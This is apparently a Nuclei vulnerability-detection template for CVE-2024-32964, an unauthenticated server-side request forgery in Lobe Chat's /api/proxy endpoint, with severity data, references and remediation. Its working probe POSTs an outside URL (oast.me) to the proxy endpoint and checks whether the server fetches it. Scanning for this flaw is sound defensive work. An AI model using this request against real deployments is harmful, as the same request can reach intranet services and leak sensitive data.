id: CVE-2024-32964 info: name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery author: s4e-io severity: critical description: | Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information. impact: | Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services and sensitive data. remediation: | Update Lobe Chat to version 0.150.6 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32964 - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37 - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc - https://vulert.com/vuln-db/CVE-2024-32964 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H cvss-score: 9 cve-id: CVE-2024-32964 cwe-id: CWE-918 epss-score: 0.69363 epss-percentile: 0.98675 metadata: verified: true max-request: 2 vendor: lobehub product: lobe-chat fofa-query: icon_hash="1975020705" tags: cve,cve2024,lobechat,ssrf,vuln flow: http(1) && http(2) http: - raw: - | GET /welcome HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: dsl dsl: - 'contains(tolower(body), "lobechat")' - 'status_code == 200' condition: and internal: true - raw: - | POST /api/proxy HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain http://oast.me matchers: - type: word part: response words: - "

Interactsh Server

" # digest: 490a0046304402205c66fb443509df213dbdd3ad176b3577f4cfe112e3872d508252c0ea816ce40702207f4a98001aa4b162e4351dffbe335217363d6e000c5e29d95ae65a3f3d32c6cc:922c64590222798bb761d5b6d8e72950